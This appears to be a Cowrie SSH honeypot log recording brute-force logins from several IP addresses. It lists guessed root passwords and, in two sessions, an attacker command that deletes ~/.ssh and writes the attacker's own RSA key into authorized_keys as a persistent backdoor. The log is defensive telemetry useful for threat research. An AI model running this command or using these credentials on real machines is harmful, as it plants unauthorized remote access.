{"eventid":"cowrie.login.failed","username":"steam","password":"1","message":"login attempt [steam/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:25:01.261591Z","src_ip":"51.81.118.153","session":"773402f833c5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:02.362186Z","src_ip":"51.81.118.153","session":"773402f833c5"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":33111,"dst_ip":"1.2.3.4","dst_port":22,"session":"128e468446df","protocol":"ssh","message":"New connection: 154.209.4.55:33111 (1.2.3.4:22) [session: 128e468446df]","sensor":"my-vps","timestamp":"2025-09-09T04:25:22.024004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:22.026436Z","src_ip":"154.209.4.55","session":"128e468446df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:22.237808Z","src_ip":"154.209.4.55","session":"128e468446df"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234!@#$","message":"login attempt [ubuntu/1234!@#$] failed","sensor":"my-vps","timestamp":"2025-09-09T04:25:23.119764Z","src_ip":"154.209.4.55","session":"128e468446df"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:24.336031Z","src_ip":"154.209.4.55","session":"128e468446df"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":37174,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f9987272ed1","protocol":"ssh","message":"New connection: 211.22.25.164:37174 (1.2.3.4:22) [session: 7f9987272ed1]","sensor":"my-vps","timestamp":"2025-09-09T04:25:32.628386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:32.630341Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:32.869653Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.login.success","username":"root","password":"mingyuan","message":"login attempt [root/mingyuan] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:25:33.830105Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:25:34.325049Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:25:34.325893Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:25:34.327266Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:34.568662Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:25:35.168052Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.168750Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.410612Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.411625Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":37182,"dst_ip":"1.2.3.4","dst_port":22,"session":"c36736ae3892","protocol":"ssh","message":"New connection: 211.22.25.164:37182 (1.2.3.4:22) [session: c36736ae3892]","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.650893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.651632Z","src_ip":"211.22.25.164","session":"c36736ae3892"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:35.891252Z","src_ip":"211.22.25.164","session":"c36736ae3892"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:25:36.893392Z","src_ip":"211.22.25.164","session":"c36736ae3892"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:38.135151Z","src_ip":"211.22.25.164","session":"c36736ae3892"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":56482,"dst_ip":"1.2.3.4","dst_port":22,"session":"6043ab6f7bc9","protocol":"ssh","message":"New connection: 211.22.25.164:56482 (1.2.3.4:22) [session: 6043ab6f7bc9]","sensor":"my-vps","timestamp":"2025-09-09T04:25:38.374799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:38.375702Z","src_ip":"211.22.25.164","session":"6043ab6f7bc9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:38.615582Z","src_ip":"211.22.25.164","session":"6043ab6f7bc9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:25:39.619397Z","src_ip":"211.22.25.164","session":"6043ab6f7bc9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:39.861435Z","src_ip":"211.22.25.164","session":"6043ab6f7bc9"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:39.862515Z","src_ip":"211.22.25.164","session":"7f9987272ed1"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":45576,"dst_ip":"1.2.3.4","dst_port":22,"session":"29ef88ad1cad","protocol":"ssh","message":"New connection: 192.210.135.20:45576 (1.2.3.4:22) [session: 29ef88ad1cad]","sensor":"my-vps","timestamp":"2025-09-09T04:25:44.418400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:44.419814Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:44.529148Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ck3tf3nc3","message":"login attempt [root/p@ck3tf3nc3] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.007884Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:25:45.302697Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.303384Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.304348Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.415360Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:25:45.649817Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.650528Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.762642Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.763630Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":46912,"dst_ip":"1.2.3.4","dst_port":22,"session":"195836fdd6b0","protocol":"ssh","message":"New connection: 192.210.135.20:46912 (1.2.3.4:22) [session: 195836fdd6b0]","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.870927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.872051Z","src_ip":"192.210.135.20","session":"195836fdd6b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:45.981209Z","src_ip":"192.210.135.20","session":"195836fdd6b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:25:46.459278Z","src_ip":"192.210.135.20","session":"195836fdd6b0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:47.571151Z","src_ip":"192.210.135.20","session":"195836fdd6b0"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":47668,"dst_ip":"1.2.3.4","dst_port":22,"session":"a367bd5608ab","protocol":"ssh","message":"New connection: 192.210.135.20:47668 (1.2.3.4:22) [session: a367bd5608ab]","sensor":"my-vps","timestamp":"2025-09-09T04:25:47.679979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:25:47.680837Z","src_ip":"192.210.135.20","session":"a367bd5608ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:25:47.790356Z","src_ip":"192.210.135.20","session":"a367bd5608ab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:25:48.268105Z","src_ip":"192.210.135.20","session":"a367bd5608ab"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:48.379119Z","src_ip":"192.210.135.20","session":"29ef88ad1cad"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:25:48.380206Z","src_ip":"192.210.135.20","session":"a367bd5608ab"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":58576,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb1af0a53182","protocol":"ssh","message":"New connection: 103.59.95.12:58576 (1.2.3.4:22) [session: fb1af0a53182]","sensor":"my-vps","timestamp":"2025-09-09T04:26:00.653768Z"}
